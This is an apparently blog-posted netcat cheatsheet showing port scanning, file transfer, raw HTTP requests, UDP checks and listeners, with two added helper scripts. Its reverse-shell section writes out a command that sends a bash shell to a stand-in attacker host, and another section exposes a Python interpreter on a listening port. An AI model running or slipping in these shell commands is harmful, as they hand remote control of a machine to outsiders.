Cheatsheet & Examples: nc

Hong

Port Scanning

Example Usage:
nc -zv example.com 80 443

What it does:
Checks whether the specified ports on a target host accept TCP connections. The -z option puts nc in zero-I/O mode, so it reports the outcome of each connection attempt without sending any data, and -v prints that outcome for every port.

Command-line Arguments Explained:

  • -z: Enables zero-I/O mode, which connects to each port and reports whether it is open without sending or reading any data.
  • -v: Enables verbose mode to display detailed information about the scan.
  • example.com: Target hostname or IP address.
  • 80 443: Port numbers to scan.
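As an added example (not from the original post), the script below probes a list of ports with a per-port timeout and turns nc's verbose verdicts into a short open/closed report. It assumes the OpenBSD-style netcat shipped by most Linux distributions and the output format quoted in its comments.

```shell
#!/bin/sh
# Added example (not from the original post): probe a list of TCP ports with
# a per-port timeout and turn nc's verbose verdicts into an open/closed report.
# Assumes the OpenBSD-style netcat shipped by most Linux distributions, which
# prints "Connection to HOST PORT port [tcp/NAME] succeeded!" on success and
# "nc: connect to HOST port PORT (tcp) failed: ..." (or "timed out: ...")
# otherwise. Note that -z still completes a full TCP handshake on every open
# port, so the scan shows up in the target's connection logs.

# Classify one line of `nc -zv` output as "PORT open" or "PORT closed";
# returns 1 for lines it does not recognise.
classify_nc_line() {
    case $1 in
        *"succeeded!"*)
            # "Connection to HOST PORT port ..." : the port is the 4th word
            printf '%s open\n' "$(printf '%s\n' "$1" | awk '{print $4}')" ;;
        *"failed"*|*"refused"*|*"timed out"*)
            printf '%s closed\n' \
                "$(printf '%s\n' "$1" | sed -n 's/.* port \([0-9][0-9]*\) .*/\1/p')" ;;
        *) return 1 ;;
    esac
}

# Probe each port separately with a 3-second timeout (-w 3) so one filtered
# port cannot stall the rest; nc writes its verdicts to stderr, hence 2>&1.
scan_ports() {
    host=$1; shift
    for port in "$@"; do
        nc -z -v -w 3 "$host" "$port" 2>&1 | while IFS= read -r line; do
            classify_nc_line "$line" || printf '%s unknown: %s\n' "$port" "$line"
        done
    done
}

# Count the open ports in a block of nc output (one verdict per line).
count_open() {
    printf '%s\n' "$1" | while IFS= read -r line; do
        classify_nc_line "$line" || true
    done | awk '/ open$/ {n++} END {print n + 0}'
}

# Usage: ./scan.sh HOST PORT [PORT...]   e.g. ./scan.sh example.com 22 80 443
if [ $# -ge 2 ]; then
    scan_ports "$@"
fi
```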

Connecting to a Remote Server

Example Usage:
nc example.com 80

What it does:
Establishes a TCP connection to a remote server on a specified port, allowing data to be sent or received.

Command-line Arguments Explained:

  • example.com: Target hostname or IP address.
  • 80: Port number to connect to.

Listening for Incoming Connections

Example Usage:
nc -l 8080

What it does:
Listens for incoming TCP connections on a specified port, acting as a simple server.

Command-line Arguments Explained:

  • -l: Enables listening mode (server).
  • 8080: Port number to listen on.

File Transfer Between Machines

Example Usage:
Receiver: nc -l 9999 > received_file.txt
Sender: nc 192.168.1.1 9999 < send_file.txt

What it does:
Transfers files between two machines over a network by using Netcat as a data conduit.

Command-line Arguments Explained:

  • -l: Enables listening mode on the receiver.
  • 9999: Port number for the transfer.
  • > received_file.txt: Redirects received data to a file.
  • < send_file.txt: Feeds the contents of a file to the remote host on stdin (with the OpenBSD nc, add -N so the sender closes the connection once it reaches end of file).

Sending Data to a Server

Example Usage:
printf 'GET / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n' | nc example.com 80

What it does:
Sends raw data (e.g., HTTP requests) to a server via a TCP connection.

Command-line Arguments Explained:

  • example.com: Target hostname or IP address.
  • 80: Port number to send data to.

UDP Communication

Example Usage:
nc -u 192.168.1.1 53

What it does:
Sends UDP datagrams to a remote host and port; because UDP has no handshake, nc reports nothing until a reply or an ICMP error arrives. Useful for testing DNS or other UDP-based services.

Command-line Arguments Explained:

  • -u: Specifies UDP protocol instead of TCP.
  • 192.168.1.1: Target hostname or IP address.
  • 53: Port number (e.g., DNS).

Reverse Shell (Security Use Case)

Example Usage:
nc -e /bin/bash attacker.com 4444

What it does:
Connects to a remote host (e.g., an attacker’s machine) and provides a shell, often used for reverse connections in penetration testing.

Command-line Arguments Explained:

  • -e: Executes the specified program (e.g., /bin/bash) with its stdin and stdout attached to the connection; this option exists in netcat-traditional and ncat but not in the OpenBSD nc.
  • attacker.com: Target hostname or IP address.
  • 4444: Port number to connect to.

Timeouts and Connection Management

Example Usage:
nc -w 5 example.com 22

What it does:
Sets a timeout for connection attempts or data transfers. If no response is received within the timeout, the command exits.

Command-line Arguments Explained:

  • -w 5: Sets a 5-second timeout for the connection.
  • example.com: Target host.
  • 22: Port number (e.g., SSH).

Using Source IP/Port

Example Usage:
nc -s 192.168.1.100 -p 5000 example.com 80

What it does:
Specifies a source IP address and port for outgoing connections, useful for testing network interfaces or bypassing firewall rules.

Command-line Arguments Explained:

  • -s 192.168.1.100: Sets the source IP address.
  • -p 5000: Sets the source port.
  • example.com: Target host.
  • 80: Target port.

Creating a Simple Chat Server

Example Usage:
Receiver: nc -l 1234
Sender: nc 192.168.1.1 1234

What it does:
Establishes a basic two-way communication channel between two machines, useful for ad-hoc chat or testing.

Command-line Arguments Explained:

  • -l: Enables listening mode on the receiver.
  • 1234: Port number for the chat channel.
  • 192.168.1.1: Receiver’s IP address (sender’s target).

Redirecting Output to a File

Example Usage:
nc 192.168.1.1 80 > output.html

What it does:
Saves the data received from a remote server (e.g., an HTTP response) to a local file.

Command-line Arguments Explained:

  • 192.168.1.1: Target host.
  • 80: Port number.
  • > output.html: Redirects the received data to a file.

Listening with Keep-Alive (-k)

Example Usage:
nc -l -k 9999

What it does:
Listens for incoming connections and stays active after each connection is closed, allowing continuous use.

Command-line Arguments Explained:

  • -l: Enables listening mode.
  • -k: Keeps the listener running after a connection ends.
  • 9999: Port number.

Testing HTTP Servers

Example Usage:
nc example.com 80
Then type GET / HTTP/1.1, press Enter, type Host: example.com, and press Enter twice (HTTP/1.1 requires the Host header, and the empty line ends the request).

What it does:
Manually interacts with an HTTP server to test responses or troubleshoot issues.

Command-line Arguments Explained:

  • example.com: Target hostname.
  • 80: Port for HTTP.
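As an added example (not from the original post) covering both "Sending Data to a Server" and this section, the script below builds a request that an HTTP/1.1 server will actually accept, sends it through nc, and pulls the status code and a chosen header out of the raw reply. The sample reply it checks itself against is constructed, not captured from any real host.

```shell
#!/bin/sh
# Added example (not from the original post): talk HTTP/1.1 to a server
# through nc with a request the server will actually accept, then read the
# status line and a chosen header out of the raw reply. HTTP/1.1 needs a
# Host header, CRLF line endings and a blank line to end the request, and
# "Connection: close" makes the server hang up so nc exits instead of
# sitting on an idle keep-alive connection. The sample reply is constructed.

# Raw request bytes for HOST ($1) and PATH ($2).
build_http_request() {
    printf 'GET %s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' "$2" "$1"
}

# Send the request and capture the whole reply; -w 5 bounds the wait so a
# server that never answers cannot hang the script. Port defaults to 80.
fetch_raw() {
    build_http_request "$1" "$2" | nc -w 5 "$1" "${3:-80}"
}

# Numeric status code from a raw reply ("HTTP/1.1 301 Moved Permanently" -> 301).
http_status() {
    printf '%s\n' "$1" | head -n 1 | tr -d '\r' | awk '{print $2}'
}

# Value of header $1 in raw reply $2, matched case-insensitively and only
# within the header block (sed quits at the first blank line), so text in
# the body that merely looks like a header is never picked up.
http_header() {
    printf '%s\n' "$2" | tr -d '\r' | sed '/^$/q' \
        | awk -v name="$1" 'tolower($1) == (tolower(name) ":") {
              sub(/^[^:]*:[ \t]*/, ""); print; exit }'
}

# Constructed sample reply (not captured from any real host), CRLF-terminated
# like a real one, with a body line deliberately shaped like a header.
sample_response() {
    printf 'HTTP/1.1 200 OK\r\nServer: ExampleServer/1.0\r\n'
    printf 'Content-Type: text/html\r\n\r\n<html>Server: body-text</html>\r\n'
}

# Usage: ./http_probe.sh HOST [PATH] [PORT]; prints the status and Server header.
if [ $# -ge 1 ]; then
    reply=$(fetch_raw "$1" "${2:-/}" "${3:-80}")
    printf 'status=%s server=%s\n' "$(http_status "$reply")" "$(http_header Server "$reply")"
fi
```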

Basic Data Relay

Example Usage:
nc -u -z 192.168.1.1 53

What it does:
Checks whether a UDP port is reachable before relaying data over it. Because -z sends no payload and UDP has no handshake, nc reports the port as open unless an ICMP port-unreachable reply comes back, so a silent or filtered host looks the same as an open port.

Command-line Arguments Explained:

  • -u: Uses UDP protocol.
  • -z: Scans the port without sending data.
  • 192.168.1.1: Target host.
  • 53: Port for DNS or UDP service.

Running Commands on Connection

Example Usage:
nc -l -p 8080 -e /usr/bin/python3

What it does:
Starts a listener on a port and runs the given program (here a Python interpreter) when a client connects, with the program's stdin and stdout attached to that connection.

Command-line Arguments Explained:

  • -l: Enables listening mode.
  • -p 8080: Specifies the port to listen on.
  • -e /usr/bin/python3: Executes the given command upon connection.

Written by

Hong

I am a developer from Malaysia. I work with PHP most of the time, recently I fell in love with Go. When I am not working, I will be ballroom dancing :-)